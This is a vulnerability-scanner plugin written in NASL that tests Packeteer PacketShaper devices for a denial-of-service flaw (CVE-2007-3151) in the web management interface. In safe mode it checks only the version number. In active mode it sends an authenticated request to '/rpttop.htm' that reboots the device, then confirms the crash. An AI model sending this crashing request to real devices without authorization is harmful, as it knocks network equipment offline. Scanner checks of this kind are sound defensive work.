# nnposter
# GPL
# kst-depend-rpc


    desc="
Synopsis :

The remote host is affected by a denial of service vulnerability. 

Description :

Packeteer PacketShaper is susceptible to a denial of service
vulnerability in the web management interface.  Requesting a specific
URL will cause the device to reboot.  The user must first log in but
even read-only access is sufficient. 

See also :

http://www.securityfocus.com/archive/1/470835/30/0/threaded

Solution :

Restrict network access to the device management interfaces. 

Risk factor : 

Medium / CVSS Base Score : 5.0
(CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P)";


if (description)
    {
    script_id(80030);
    script_version ("$Revision: 1.4 $");
    script_tag(name:"cvss_base", value:"5.0");
    script_tag(name:"risk_factor", value:"Medium");

    script_cve_id("CVE-2007-3151");
    script_bugtraq_id(24388);
    script_xref(name:"OSVDB", value:"37230");

    name="Packeteer PacketShaper Web Denial of Service";
    script_name(name);

    script_description(desc);

    summary="Tests for Packeteer PacketShaper web management interface DoS";
    script_summary(summary);

    family="Web application abuses";
    script_family(family);

    script_category(ACT_MIXED_ATTACK);

    script_copyright("This script is Copyright (c) 2006-2007 nnposter");
    script_dependencies("packeteer_web_version.nasl");
    script_require_keys("www/packeteer");
    script_require_ports("Services/www",80);
    exit(0);
    }

# Notes:
# - Does not work with http_keepalive_send_recv() for some reason.
#   Resorting to http_send_recv()


include("http_func.inc");
include("misc_func.inc");


if (!get_kb_item("www/packeteer")) exit(0);


function set_cookie (data,cookie)
{
local_var EOL,req;
EOL='\r\n';
req=ereg_replace(string:data,pattern:EOL+'Cookie:[^\r\n]+',replace:"");
req=ereg_replace(string:req,pattern:EOL+EOL,replace:EOL+cookie+EOL);
return req;
}


function get_version_snmp ()
{
local_var sys,match,ver;
sys=get_kb_item("SNMP/sysDesc");
if (!sys) return;
match=eregmatch(pattern:"^Packeteer PacketShaper ([A-Za-z0-9.]+)",string:sys);
ver=match[1];
if (!ver) return;
return ver;
}


port=get_http_port(default:80);
product=get_kb_item("www/"+port+"/packeteer");
if (!get_tcp_port_state(port) || product!="PacketShaper") exit(0);


if (safe_checks())
    {
    KNOWN_BROKEN_VERSION="7.5.1g1";
    version=get_kb_item("www/"+port+"/packeteer/version");
#if (!version) version=get_version_snmp();
    if (version && version =~ "^([0-6]\.|7\.([0-4]\.|5\.(0|1([a-f]|g0))))")
        {
        report = string(
          desc,
          "\n\n",
          "Plugin output :\n",
          "\n",
          "The vulnerability has not been tested. The assessment is based\n",
          "solely on the device software version, which is ",version,"."
        );
        security_warning(port:port,data:report);
        }
    exit(0);
    }

cookie=get_kb_item("/tmp/http/auth/"+port);
if (!cookie) exit(0);

if (http_is_dead(port:port)) exit(0);
req=http_get(item:"/rpttop.htm?OP.MEAS.DATAQUERY=&MEAS.TYPE=",port:port);
resp=http_send_recv(port:port,data:set_cookie(data:req,cookie:cookie));
if (!http_is_dead(port:port)) exit(0);

security_warning(port);
